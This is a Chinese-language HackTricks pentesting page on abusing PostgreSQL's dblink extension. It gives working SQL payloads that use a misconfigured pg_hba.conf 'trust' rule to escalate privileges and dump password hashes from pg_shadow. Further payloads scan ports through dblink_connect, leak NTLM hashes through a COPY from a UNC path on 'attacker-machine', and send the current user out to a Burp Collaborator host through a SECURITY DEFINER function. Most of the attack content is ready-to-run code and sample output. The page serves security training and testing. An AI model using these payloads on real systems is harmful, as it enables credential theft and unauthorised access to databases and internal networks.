Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

自 PostgreSQL 9.1 以来，安装额外模块变得简单。可以使用 CREATE EXTENSION 安装注册扩展如 dblink：

CREATE EXTENSION dblink;

一旦你加载了 dblink，你就可以执行一些有趣的技巧：

权限提升

文件 pg_hba.conf 可能配置不当 允许从 localhost 以任何用户身份连接 而无需知道密码。这个文件通常可以在 /etc/postgresql/12/main/pg_hba.conf 中找到，错误的配置看起来像：

local    all    all    trust

请注意，这种配置通常用于在管理员忘记数据库用户密码时修改密码，因此有时您可能会找到它。 还要注意，文件 pg_hba.conf 仅可由 postgres 用户和组读取，并且仅可由 postgres 用户写入。

这种情况是 有用的，如果 你已经在受害者的 shell 中，因为它将允许你连接到 postgresql 数据库。

另一个可能的错误配置类似于：

host    all     all     127.0.0.1/32    trust

因为它将允许来自本地主机的每个人以任何用户身份连接到数据库。在这种情况下，如果**dblink函数正常工作**，您可以通过通过已建立的连接连接到数据库来提升权限，并访问不应该能够访问的数据：

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

Port Scanning

通过滥用 dblink_connect，您还可以搜索开放端口。如果该函数不起作用，您应该尝试使用 dblink_connect_u()，因为文档说明 dblink_connect_u() 与 dblink_connect() 相同，只是它允许非超级用户使用任何身份验证方法进行连接。

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

注意，在能够使用 dblink_connect 或 dblink_connect_u 之前，您可能需要执行：

CREATE extension dblink;

UNC 路径 - NTLM 哈希泄露

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

PreviousPL/pgSQL Password Bruteforce NextBig Binary Files Upload (PostgreSQL)

Last updated 1 month ago